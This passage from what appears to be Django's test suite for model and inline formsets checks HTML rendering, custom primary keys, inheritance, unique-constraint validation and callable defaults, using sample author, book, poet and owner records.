'<p><label for="id_form-0-name">Name:</label> <input id="id_form-0-name" type="text" name="form-0-name" value="Ernest Hemingway" maxlength="100" /></p>\n'
'<p><label for="id_form-0-write_speed">Write speed:</label> <input type="text" name="form-0-write_speed" value="10" id="id_form-0-write_speed" /><input type="hidden" name="form-0-author_ptr" value="%d" id="id_form-0-author_ptr" /></p>' % hemingway_id)
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_form-1-name">Name:</label> <input id="id_form-1-name" type="text" name="form-1-name" maxlength="100" /></p>\n'
'<p><label for="id_form-1-write_speed">Write speed:</label> <input type="text" name="form-1-write_speed" id="id_form-1-write_speed" /><input type="hidden" name="form-1-author_ptr" id="id_form-1-author_ptr" /></p>')
data = {
'form-TOTAL_FORMS': '2', # the number of forms rendered
'form-INITIAL_FORMS': '1', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-author_ptr': hemingway_id,
'form-0-name': 'Ernest Hemingway',
'form-0-write_speed': '10',
'form-1-author_ptr': '',
'form-1-name': '',
'form-1-write_speed': '',
}
formset = BetterAuthorFormSet(data)
self.assertTrue(formset.is_valid())
self.assertEqual(formset.save(), [])
def test_inline_formsets(self):
# We can also create a formset that is tied to a parent model. This is
# how the admin system's edit inline functionality works.
AuthorBooksFormSet = inlineformset_factory(Author, Book, can_delete=False, extra=3)
author = Author.objects.create(name='Charles Baudelaire')
formset = AuthorBooksFormSet(instance=author)
self.assertEqual(len(formset.forms), 3)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_book_set-0-title">Title:</label> <input id="id_book_set-0-title" type="text" name="book_set-0-title" maxlength="100" /><input type="hidden" name="book_set-0-author" value="%d" id="id_book_set-0-author" /><input type="hidden" name="book_set-0-id" id="id_book_set-0-id" /></p>' % author.id)
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_book_set-1-title">Title:</label> <input id="id_book_set-1-title" type="text" name="book_set-1-title" maxlength="100" /><input type="hidden" name="book_set-1-author" value="%d" id="id_book_set-1-author" /><input type="hidden" name="book_set-1-id" id="id_book_set-1-id" /></p>' % author.id)
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_book_set-2-title">Title:</label> <input id="id_book_set-2-title" type="text" name="book_set-2-title" maxlength="100" /><input type="hidden" name="book_set-2-author" value="%d" id="id_book_set-2-author" /><input type="hidden" name="book_set-2-id" id="id_book_set-2-id" /></p>' % author.id)
data = {
'book_set-TOTAL_FORMS': '3', # the number of forms rendered
'book_set-INITIAL_FORMS': '0', # the number of forms with initial data
'book_set-MAX_NUM_FORMS': '', # the max number of forms
'book_set-0-title': 'Les Fleurs du Mal',
'book_set-1-title': '',
'book_set-2-title': '',
}
formset = AuthorBooksFormSet(data, instance=author)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
book1, = saved
self.assertEqual(book1, Book.objects.get(title='Les Fleurs du Mal'))
self.assertQuerysetEqual(author.book_set.all(), ['<Book: Les Fleurs du Mal>'])
# Now that we've added a book to Charles Baudelaire, let's try adding
# another one. This time though, an edit form will be available for
# every existing book.
AuthorBooksFormSet = inlineformset_factory(Author, Book, can_delete=False, extra=2)
author = Author.objects.get(name='Charles Baudelaire')
formset = AuthorBooksFormSet(instance=author)
self.assertEqual(len(formset.forms), 3)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_book_set-0-title">Title:</label> <input id="id_book_set-0-title" type="text" name="book_set-0-title" value="Les Fleurs du Mal" maxlength="100" /><input type="hidden" name="book_set-0-author" value="%d" id="id_book_set-0-author" /><input type="hidden" name="book_set-0-id" value="%d" id="id_book_set-0-id" /></p>' % (author.id, book1.id))
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_book_set-1-title">Title:</label> <input id="id_book_set-1-title" type="text" name="book_set-1-title" maxlength="100" /><input type="hidden" name="book_set-1-author" value="%d" id="id_book_set-1-author" /><input type="hidden" name="book_set-1-id" id="id_book_set-1-id" /></p>' % author.id)
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_book_set-2-title">Title:</label> <input id="id_book_set-2-title" type="text" name="book_set-2-title" maxlength="100" /><input type="hidden" name="book_set-2-author" value="%d" id="id_book_set-2-author" /><input type="hidden" name="book_set-2-id" id="id_book_set-2-id" /></p>' % author.id)
data = {
'book_set-TOTAL_FORMS': '3', # the number of forms rendered
'book_set-INITIAL_FORMS': '1', # the number of forms with initial data
'book_set-MAX_NUM_FORMS': '', # the max number of forms
'book_set-0-id': str(book1.id),
'book_set-0-title': 'Les Fleurs du Mal',
'book_set-1-title': 'Les Paradis Artificiels',
'book_set-2-title': '',
}
formset = AuthorBooksFormSet(data, instance=author)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
book2, = saved
self.assertEqual(book2, Book.objects.get(title='Les Paradis Artificiels'))
# As you can see, 'Les Paradis Artificiels' is now a book belonging to
# Charles Baudelaire.
self.assertQuerysetEqual(author.book_set.order_by('title'), [
'<Book: Les Fleurs du Mal>',
'<Book: Les Paradis Artificiels>',
])
def test_inline_formsets_save_as_new(self):
# The save_as_new parameter lets you re-associate the data to a new
# instance. This is used in the admin for save_as functionality.
AuthorBooksFormSet = inlineformset_factory(Author, Book, can_delete=False, extra=2)
author = Author.objects.create(name='Charles Baudelaire')
data = {
'book_set-TOTAL_FORMS': '3', # the number of forms rendered
'book_set-INITIAL_FORMS': '2', # the number of forms with initial data
'book_set-MAX_NUM_FORMS': '', # the max number of forms
'book_set-0-id': '1',
'book_set-0-title': 'Les Fleurs du Mal',
'book_set-1-id': '2',
'book_set-1-title': 'Les Paradis Artificiels',
'book_set-2-title': '',
}
formset = AuthorBooksFormSet(data, instance=Author(), save_as_new=True)
self.assertTrue(formset.is_valid())
new_author = Author.objects.create(name='Charles Baudelaire')
formset = AuthorBooksFormSet(data, instance=new_author, save_as_new=True)
saved = formset.save()
self.assertEqual(len(saved), 2)
book1, book2 = saved
self.assertEqual(book1.title, 'Les Fleurs du Mal')
self.assertEqual(book2.title, 'Les Paradis Artificiels')
# Test using a custom prefix on an inline formset.
formset = AuthorBooksFormSet(prefix="test")
self.assertEqual(len(formset.forms), 2)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_test-0-title">Title:</label> <input id="id_test-0-title" type="text" name="test-0-title" maxlength="100" /><input type="hidden" name="test-0-author" id="id_test-0-author" /><input type="hidden" name="test-0-id" id="id_test-0-id" /></p>')
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_test-1-title">Title:</label> <input id="id_test-1-title" type="text" name="test-1-title" maxlength="100" /><input type="hidden" name="test-1-author" id="id_test-1-author" /><input type="hidden" name="test-1-id" id="id_test-1-id" /></p>')
def test_inline_formsets_with_custom_pk(self):
# Test inline formsets where the inline-edited object has a custom
# primary key that is not the fk to the parent object.
AuthorBooksFormSet2 = inlineformset_factory(Author, BookWithCustomPK, can_delete=False, extra=1)
author = Author.objects.create(pk=1, name='Charles Baudelaire')
formset = AuthorBooksFormSet2(instance=author)
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_bookwithcustompk_set-0-my_pk">My pk:</label> <input type="text" name="bookwithcustompk_set-0-my_pk" id="id_bookwithcustompk_set-0-my_pk" /></p>\n'
'<p><label for="id_bookwithcustompk_set-0-title">Title:</label> <input id="id_bookwithcustompk_set-0-title" type="text" name="bookwithcustompk_set-0-title" maxlength="100" /><input type="hidden" name="bookwithcustompk_set-0-author" value="1" id="id_bookwithcustompk_set-0-author" /></p>')
data = {
'bookwithcustompk_set-TOTAL_FORMS': '1', # the number of forms rendered
'bookwithcustompk_set-INITIAL_FORMS': '0', # the number of forms with initial data
'bookwithcustompk_set-MAX_NUM_FORMS': '', # the max number of forms
'bookwithcustompk_set-0-my_pk': '77777',
'bookwithcustompk_set-0-title': 'Les Fleurs du Mal',
}
formset = AuthorBooksFormSet2(data, instance=author)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
book1, = saved
self.assertEqual(book1.pk, 77777)
book1 = author.bookwithcustompk_set.get()
self.assertEqual(book1.title, 'Les Fleurs du Mal')
def test_inline_formsets_with_multi_table_inheritance(self):
# Test inline formsets where the inline-edited object uses multi-table
# inheritance, thus has a non AutoField yet auto-created primary key.
AuthorBooksFormSet3 = inlineformset_factory(Author, AlternateBook, can_delete=False, extra=1)
author = Author.objects.create(pk=1, name='Charles Baudelaire')
formset = AuthorBooksFormSet3(instance=author)
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_alternatebook_set-0-title">Title:</label> <input id="id_alternatebook_set-0-title" type="text" name="alternatebook_set-0-title" maxlength="100" /></p>\n'
'<p><label for="id_alternatebook_set-0-notes">Notes:</label> <input id="id_alternatebook_set-0-notes" type="text" name="alternatebook_set-0-notes" maxlength="100" /><input type="hidden" name="alternatebook_set-0-author" value="1" id="id_alternatebook_set-0-author" /><input type="hidden" name="alternatebook_set-0-book_ptr" id="id_alternatebook_set-0-book_ptr" /></p>')
data = {
'alternatebook_set-TOTAL_FORMS': '1', # the number of forms rendered
'alternatebook_set-INITIAL_FORMS': '0', # the number of forms with initial data
'alternatebook_set-MAX_NUM_FORMS': '', # the max number of forms
'alternatebook_set-0-title': 'Flowers of Evil',
'alternatebook_set-0-notes': 'English translation of Les Fleurs du Mal'
}
formset = AuthorBooksFormSet3(data, instance=author)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
book1, = saved
self.assertEqual(book1.title, 'Flowers of Evil')
self.assertEqual(book1.notes, 'English translation of Les Fleurs du Mal')
@skipUnlessDBFeature('ignores_nulls_in_unique_constraints')
def test_inline_formsets_with_nullable_unique_together(self):
# Test inline formsets where the inline-edited object has a
# unique_together constraint with a nullable member
AuthorBooksFormSet4 = inlineformset_factory(Author, BookWithOptionalAltEditor, can_delete=False, extra=2)
author = Author.objects.create(pk=1, name='Charles Baudelaire')
data = {
'bookwithoptionalalteditor_set-TOTAL_FORMS': '2', # the number of forms rendered
'bookwithoptionalalteditor_set-INITIAL_FORMS': '0', # the number of forms with initial data
'bookwithoptionalalteditor_set-MAX_NUM_FORMS': '', # the max number of forms
'bookwithoptionalalteditor_set-0-author': '1',
'bookwithoptionalalteditor_set-0-title': 'Les Fleurs du Mal',
'bookwithoptionalalteditor_set-1-author': '1',
'bookwithoptionalalteditor_set-1-title': 'Les Fleurs du Mal',
}
formset = AuthorBooksFormSet4(data, instance=author)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 2)
book1, book2 = saved
self.assertEqual(book1.author_id, 1)
self.assertEqual(book1.title, 'Les Fleurs du Mal')
self.assertEqual(book2.author_id, 1)
self.assertEqual(book2.title, 'Les Fleurs du Mal')
def test_inline_formsets_with_custom_save_method(self):
AuthorBooksFormSet = inlineformset_factory(Author, Book, can_delete=False, extra=2)
author = Author.objects.create(pk=1, name='Charles Baudelaire')
book1 = Book.objects.create(pk=1, author=author, title='Les Paradis Artificiels')
book2 = Book.objects.create(pk=2, author=author, title='Les Fleurs du Mal')
book3 = Book.objects.create(pk=3, author=author, title='Flowers of Evil')
class PoemForm(forms.ModelForm):
def save(self, commit=True):
# change the name to "Brooklyn Bridge" just to be a jerk.
poem = super(PoemForm, self).save(commit=False)
poem.name = "Brooklyn Bridge"
if commit:
poem.save()
return poem
PoemFormSet = inlineformset_factory(Poet, Poem, form=PoemForm)
data = {
'poem_set-TOTAL_FORMS': '3', # the number of forms rendered
'poem_set-INITIAL_FORMS': '0', # the number of forms with initial data
'poem_set-MAX_NUM_FORMS': '', # the max number of forms
'poem_set-0-name': 'The Cloud in Trousers',
'poem_set-1-name': 'I',
'poem_set-2-name': '',
}
poet = Poet.objects.create(name='Vladimir Mayakovsky')
formset = PoemFormSet(data=data, instance=poet)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 2)
poem1, poem2 = saved
self.assertEqual(poem1.name, 'Brooklyn Bridge')
self.assertEqual(poem2.name, 'Brooklyn Bridge')
# We can provide a custom queryset to our InlineFormSet:
custom_qs = Book.objects.order_by('-title')
formset = AuthorBooksFormSet(instance=author, queryset=custom_qs)
self.assertEqual(len(formset.forms), 5)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_book_set-0-title">Title:</label> <input id="id_book_set-0-title" type="text" name="book_set-0-title" value="Les Paradis Artificiels" maxlength="100" /><input type="hidden" name="book_set-0-author" value="1" id="id_book_set-0-author" /><input type="hidden" name="book_set-0-id" value="1" id="id_book_set-0-id" /></p>')
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_book_set-1-title">Title:</label> <input id="id_book_set-1-title" type="text" name="book_set-1-title" value="Les Fleurs du Mal" maxlength="100" /><input type="hidden" name="book_set-1-author" value="1" id="id_book_set-1-author" /><input type="hidden" name="book_set-1-id" value="2" id="id_book_set-1-id" /></p>')
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_book_set-2-title">Title:</label> <input id="id_book_set-2-title" type="text" name="book_set-2-title" value="Flowers of Evil" maxlength="100" /><input type="hidden" name="book_set-2-author" value="1" id="id_book_set-2-author" /><input type="hidden" name="book_set-2-id" value="3" id="id_book_set-2-id" /></p>')
self.assertHTMLEqual(formset.forms[3].as_p(),
'<p><label for="id_book_set-3-title">Title:</label> <input id="id_book_set-3-title" type="text" name="book_set-3-title" maxlength="100" /><input type="hidden" name="book_set-3-author" value="1" id="id_book_set-3-author" /><input type="hidden" name="book_set-3-id" id="id_book_set-3-id" /></p>')
self.assertHTMLEqual(formset.forms[4].as_p(),
'<p><label for="id_book_set-4-title">Title:</label> <input id="id_book_set-4-title" type="text" name="book_set-4-title" maxlength="100" /><input type="hidden" name="book_set-4-author" value="1" id="id_book_set-4-author" /><input type="hidden" name="book_set-4-id" id="id_book_set-4-id" /></p>')
data = {
'book_set-TOTAL_FORMS': '5', # the number of forms rendered
'book_set-INITIAL_FORMS': '3', # the number of forms with initial data
'book_set-MAX_NUM_FORMS': '', # the max number of forms
'book_set-0-id': str(book1.id),
'book_set-0-title': 'Les Paradis Artificiels',
'book_set-1-id': str(book2.id),
'book_set-1-title': 'Les Fleurs du Mal',
'book_set-2-id': str(book3.id),
'book_set-2-title': 'Flowers of Evil',
'book_set-3-title': 'Revue des deux mondes',
'book_set-4-title': '',
}
formset = AuthorBooksFormSet(data, instance=author, queryset=custom_qs)
self.assertTrue(formset.is_valid())
custom_qs = Book.objects.filter(title__startswith='F')
formset = AuthorBooksFormSet(instance=author, queryset=custom_qs)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_book_set-0-title">Title:</label> <input id="id_book_set-0-title" type="text" name="book_set-0-title" value="Flowers of Evil" maxlength="100" /><input type="hidden" name="book_set-0-author" value="1" id="id_book_set-0-author" /><input type="hidden" name="book_set-0-id" value="3" id="id_book_set-0-id" /></p>')
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_book_set-1-title">Title:</label> <input id="id_book_set-1-title" type="text" name="book_set-1-title" maxlength="100" /><input type="hidden" name="book_set-1-author" value="1" id="id_book_set-1-author" /><input type="hidden" name="book_set-1-id" id="id_book_set-1-id" /></p>')
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_book_set-2-title">Title:</label> <input id="id_book_set-2-title" type="text" name="book_set-2-title" maxlength="100" /><input type="hidden" name="book_set-2-author" value="1" id="id_book_set-2-author" /><input type="hidden" name="book_set-2-id" id="id_book_set-2-id" /></p>')
data = {
'book_set-TOTAL_FORMS': '3', # the number of forms rendered
'book_set-INITIAL_FORMS': '1', # the number of forms with initial data
'book_set-MAX_NUM_FORMS': '', # the max number of forms
'book_set-0-id': str(book3.id),
'book_set-0-title': 'Flowers of Evil',
'book_set-1-title': 'Revue des deux mondes',
'book_set-2-title': '',
}
formset = AuthorBooksFormSet(data, instance=author, queryset=custom_qs)
self.assertTrue(formset.is_valid())
def test_custom_pk(self):
# We need to ensure that it is displayed
CustomPrimaryKeyFormSet = modelformset_factory(CustomPrimaryKey)
formset = CustomPrimaryKeyFormSet()
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-my_pk">My pk:</label> <input id="id_form-0-my_pk" type="text" name="form-0-my_pk" maxlength="10" /></p>\n'
'<p><label for="id_form-0-some_field">Some field:</label> <input id="id_form-0-some_field" type="text" name="form-0-some_field" maxlength="100" /></p>')
# Custom primary keys with ForeignKey, OneToOneField and AutoField ############
place = Place.objects.create(pk=1, name='Giordanos', city='Chicago')
FormSet = inlineformset_factory(Place, Owner, extra=2, can_delete=False)
formset = FormSet(instance=place)
self.assertEqual(len(formset.forms), 2)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_owner_set-0-name">Name:</label> <input id="id_owner_set-0-name" type="text" name="owner_set-0-name" maxlength="100" /><input type="hidden" name="owner_set-0-place" value="1" id="id_owner_set-0-place" /><input type="hidden" name="owner_set-0-auto_id" id="id_owner_set-0-auto_id" /></p>')
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_owner_set-1-name">Name:</label> <input id="id_owner_set-1-name" type="text" name="owner_set-1-name" maxlength="100" /><input type="hidden" name="owner_set-1-place" value="1" id="id_owner_set-1-place" /><input type="hidden" name="owner_set-1-auto_id" id="id_owner_set-1-auto_id" /></p>')
data = {
'owner_set-TOTAL_FORMS': '2',
'owner_set-INITIAL_FORMS': '0',
'owner_set-MAX_NUM_FORMS': '',
'owner_set-0-auto_id': '',
'owner_set-0-name': 'Joe Perry',
'owner_set-1-auto_id': '',
'owner_set-1-name': '',
}
formset = FormSet(data, instance=place)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
owner1, = saved
self.assertEqual(owner1.name, 'Joe Perry')
self.assertEqual(owner1.place.name, 'Giordanos')
formset = FormSet(instance=place)
self.assertEqual(len(formset.forms), 3)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_owner_set-0-name">Name:</label> <input id="id_owner_set-0-name" type="text" name="owner_set-0-name" value="Joe Perry" maxlength="100" /><input type="hidden" name="owner_set-0-place" value="1" id="id_owner_set-0-place" /><input type="hidden" name="owner_set-0-auto_id" value="%d" id="id_owner_set-0-auto_id" /></p>'
% owner1.auto_id)
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_owner_set-1-name">Name:</label> <input id="id_owner_set-1-name" type="text" name="owner_set-1-name" maxlength="100" /><input type="hidden" name="owner_set-1-place" value="1" id="id_owner_set-1-place" /><input type="hidden" name="owner_set-1-auto_id" id="id_owner_set-1-auto_id" /></p>')
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_owner_set-2-name">Name:</label> <input id="id_owner_set-2-name" type="text" name="owner_set-2-name" maxlength="100" /><input type="hidden" name="owner_set-2-place" value="1" id="id_owner_set-2-place" /><input type="hidden" name="owner_set-2-auto_id" id="id_owner_set-2-auto_id" /></p>')
data = {
'owner_set-TOTAL_FORMS': '3',
'owner_set-INITIAL_FORMS': '1',
'owner_set-MAX_NUM_FORMS': '',
'owner_set-0-auto_id': six.text_type(owner1.auto_id),
'owner_set-0-name': 'Joe Perry',
'owner_set-1-auto_id': '',
'owner_set-1-name': 'Jack Berry',
'owner_set-2-auto_id': '',
'owner_set-2-name': '',
}
formset = FormSet(data, instance=place)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
owner2, = saved
self.assertEqual(owner2.name, 'Jack Berry')
self.assertEqual(owner2.place.name, 'Giordanos')
# Ensure a custom primary key that is a ForeignKey or OneToOneField get rendered for the user to choose.
FormSet = modelformset_factory(OwnerProfile)
formset = FormSet()
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-owner">Owner:</label> <select name="form-0-owner" id="id_form-0-owner">\n'
'<option value="" selected="selected">---------</option>\n'
'<option value="%d">Joe Perry at Giordanos</option>\n'
'<option value="%d">Jack Berry at Giordanos</option>\n'
'</select></p>\n'
'<p><label for="id_form-0-age">Age:</label> <input type="text" name="form-0-age" id="id_form-0-age" /></p>'
% (owner1.auto_id, owner2.auto_id))
owner1 = Owner.objects.get(name='Joe Perry')
FormSet = inlineformset_factory(Owner, OwnerProfile, max_num=1, can_delete=False)
self.assertEqual(FormSet.max_num, 1)
formset = FormSet(instance=owner1)
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_ownerprofile-0-age">Age:</label> <input type="text" name="ownerprofile-0-age" id="id_ownerprofile-0-age" /><input type="hidden" name="ownerprofile-0-owner" value="%d" id="id_ownerprofile-0-owner" /></p>'
% owner1.auto_id)
data = {
'ownerprofile-TOTAL_FORMS': '1',
'ownerprofile-INITIAL_FORMS': '0',
'ownerprofile-MAX_NUM_FORMS': '1',
'ownerprofile-0-owner': '',
'ownerprofile-0-age': '54',
}
formset = FormSet(data, instance=owner1)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
profile1, = saved
self.assertEqual(profile1.owner, owner1)
self.assertEqual(profile1.age, 54)
formset = FormSet(instance=owner1)
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_ownerprofile-0-age">Age:</label> <input type="text" name="ownerprofile-0-age" value="54" id="id_ownerprofile-0-age" /><input type="hidden" name="ownerprofile-0-owner" value="%d" id="id_ownerprofile-0-owner" /></p>'
% owner1.auto_id)
data = {
'ownerprofile-TOTAL_FORMS': '1',
'ownerprofile-INITIAL_FORMS': '1',
'ownerprofile-MAX_NUM_FORMS': '1',
'ownerprofile-0-owner': six.text_type(owner1.auto_id),
'ownerprofile-0-age': '55',
}
formset = FormSet(data, instance=owner1)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
profile1, = saved
self.assertEqual(profile1.owner, owner1)
self.assertEqual(profile1.age, 55)
def test_unique_true_enforces_max_num_one(self):
# ForeignKey with unique=True should enforce max_num=1
place = Place.objects.create(pk=1, name='Giordanos', city='Chicago')
FormSet = inlineformset_factory(Place, Location, can_delete=False)
self.assertEqual(FormSet.max_num, 1)
formset = FormSet(instance=place)
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_location_set-0-lat">Lat:</label> <input id="id_location_set-0-lat" type="text" name="location_set-0-lat" maxlength="100" /></p>\n'
'<p><label for="id_location_set-0-lon">Lon:</label> <input id="id_location_set-0-lon" type="text" name="location_set-0-lon" maxlength="100" /><input type="hidden" name="location_set-0-place" value="1" id="id_location_set-0-place" /><input type="hidden" name="location_set-0-id" id="id_location_set-0-id" /></p>')
def test_foreign_keys_in_parents(self):
self.assertEqual(type(_get_foreign_key(Restaurant, Owner)), models.ForeignKey)
self.assertEqual(type(_get_foreign_key(MexicanRestaurant, Owner)), models.ForeignKey)
def test_unique_validation(self):
FormSet = modelformset_factory(Product, extra=1)
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-slug': 'car-red',
}
formset = FormSet(data)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
product1, = saved
self.assertEqual(product1.slug, 'car-red')
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-slug': 'car-red',
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset.errors, [{'slug': ['Product with this Slug already exists.']}])
def test_unique_together_validation(self):
FormSet = modelformset_factory(Price, extra=1)
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-price': '12.00',
'form-0-quantity': '1',
}
formset = FormSet(data)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
price1, = saved
self.assertEqual(price1.price, Decimal('12.00'))
self.assertEqual(price1.quantity, 1)
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-price': '12.00',
'form-0-quantity': '1',
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset.errors, [{'__all__': ['Price with this Price and Quantity already exists.']}])
def test_unique_together_with_inlineformset_factory(self):
# Also see bug #8882.
repository = Repository.objects.create(name='Test Repo')
FormSet = inlineformset_factory(Repository, Revision, extra=1)
data = {
'revision_set-TOTAL_FORMS': '1',
'revision_set-INITIAL_FORMS': '0',
'revision_set-MAX_NUM_FORMS': '',
'revision_set-0-repository': repository.pk,
'revision_set-0-revision': '146239817507f148d448db38840db7c3cbf47c76',
'revision_set-0-DELETE': '',
}
formset = FormSet(data, instance=repository)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
revision1, = saved
self.assertEqual(revision1.repository, repository)
self.assertEqual(revision1.revision, '146239817507f148d448db38840db7c3cbf47c76')
# attempt to save the same revision against against the same repo.
data = {
'revision_set-TOTAL_FORMS': '1',
'revision_set-INITIAL_FORMS': '0',
'revision_set-MAX_NUM_FORMS': '',
'revision_set-0-repository': repository.pk,
'revision_set-0-revision': '146239817507f148d448db38840db7c3cbf47c76',
'revision_set-0-DELETE': '',
}
formset = FormSet(data, instance=repository)
self.assertFalse(formset.is_valid())
self.assertEqual(formset.errors, [{'__all__': ['Revision with this Repository and Revision already exists.']}])
# unique_together with inlineformset_factory with overridden form fields
# Also see #9494
FormSet = inlineformset_factory(Repository, Revision, fields=('revision',), extra=1)
data = {
'revision_set-TOTAL_FORMS': '1',
'revision_set-INITIAL_FORMS': '0',
'revision_set-MAX_NUM_FORMS': '',
'revision_set-0-repository': repository.pk,
'revision_set-0-revision': '146239817507f148d448db38840db7c3cbf47c76',
'revision_set-0-DELETE': '',
}
formset = FormSet(data, instance=repository)
self.assertFalse(formset.is_valid())
def test_callable_defaults(self):
# Use of callable defaults (see bug #7975).
person = Person.objects.create(name='Ringo')
FormSet = inlineformset_factory(Person, Membership, can_delete=False, extra=1)
formset = FormSet(instance=person)
# Django will render a hidden field for model fields that have a callable
# default. This is required to ensure the value is tested for change correctly
# when determine what extra forms have changed to save.
self.assertEqual(len(formset.forms), 1) # this formset only has one form
form = formset.forms[0]
now = form.fields['date_joined'].initial()
result = form.as_p()
result = re.sub(r'\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}(?:\.\d+)?', '__DATETIME__', result)
self.assertHTMLEqual(result,
'<p><label for="id_membership_set-0-date_joined">Date joined:</label> <input type="text" name="membership_set-0-date_joined" value="__DATETIME__" id="id_membership_set-0-date_joined" /><input type="hidden" name="initial-membership_set-0-date_joined" value="__DATETIME__" id="initial-membership_set-0-id_membership_set-0-date_joined" /></p>\n'
'<p><label for="id_membership_set-0-karma">Karma:</label> <input type="text" name="membership_set-0-karma" id="id_membership_set-0-karma" /><input type="hidden" name="membership_set-0-person" value="%d" id="id_membership_set-0-person" /><input type="hidden" name="membership_set-0-id" id="id_membership_set-0-id" /></p>'
% person.id)
# test for validation with callable defaults. Validations rely on hidden fields
data = {
'membership_set-TOTAL_FORMS': '1',
'membership_set-INITIAL_FORMS': '0',
'membership_set-MAX_NUM_FORMS': '',
'membership_set-0-date_joined': six.text_type(now.strftime('%Y-%m-%d %H:%M:%S')),
'initial-membership_set-0-date_joined': six.text_type(now.strftime('%Y-%m-%d %H:%M:%S')),
'membership_set-0-karma': '',
}
formset = FormSet(data, instance=person)
self.assertTrue(formset.is_valid())
# now test for when the data changes
one_day_later = now + datetime.timedelta(days=1)
filled_data = {
'membership_set-TOTAL_FORMS': '1',
'membership_set-INITIAL_FORMS': '0',
'membership_set-MAX_NUM_FORMS': '',
'membership_set-0-date_joined': six.text_type(one_day_later.strftime('%Y-%m-%d %H:%M:%S')),
'initial-membership_set-0-date_joined': six.text_type(now.strftime('%Y-%m-%d %H:%M:%S')),
'membership_set-0-karma': '',
}
formset = FormSet(filled_data, instance=person)
self.assertFalse(formset.is_valid())
# now test with split datetime fields
class MembershipForm(forms.ModelForm):
date_joined = forms.SplitDateTimeField(initial=now)
class Meta:
model = Membership
def __init__(self, **kwargs):
super(MembershipForm, self).__init__(**kwargs)
self.fields['date_joined'].widget = forms.SplitDateTimeWidget()
FormSet = inlineformset_factory(Person, Membership, form=MembershipForm, can_delete=False, extra=1)
data = {
'membership_set-TOTAL_FORMS': '1',
'membership_set-INITIAL_FORMS': '0',
'membership_set-MAX_NUM_FORMS': '',
'membership_set-0-date_joined_0': six.text_type(now.strftime('%Y-%m-%d')),
'membership_set-0-date_joined_1': six.text_type(now.strftime('%H:%M:%S')),
'initial-membership_set-0-date_joined': six.text_type(now.strftime('%Y-%m-%d %H:%M:%S')),
'membership_set-0-karma': '',
}
formset = FormSet(data, instance=person)
self.assertTrue(formset.is_valid())
def test_inlineformset_factory_with_null_fk(self):
# inlineformset_factory tests with fk having null=True. see #9462.
# create some data that will exbit the issue
team = Team.objects.create(name="Red Vipers")
Player(name="Timmy").save()
Player(name="Bobby", team=team).save()
PlayerInlineFormSet = inlineformset_factory(Team, Player)
formset = PlayerInlineFormSet()
self.assertQuerysetEqual(formset.get_queryset(), [])
formset = PlayerInlineFormSet(instance=team)
players = formset.get_queryset()
self.assertEqual(len(players), 1)
player1, = players
self.assertEqual(player1.team, team)
self.assertEqual(player1.name, 'Bobby')
def test_model_formset_with_custom_pk(self):
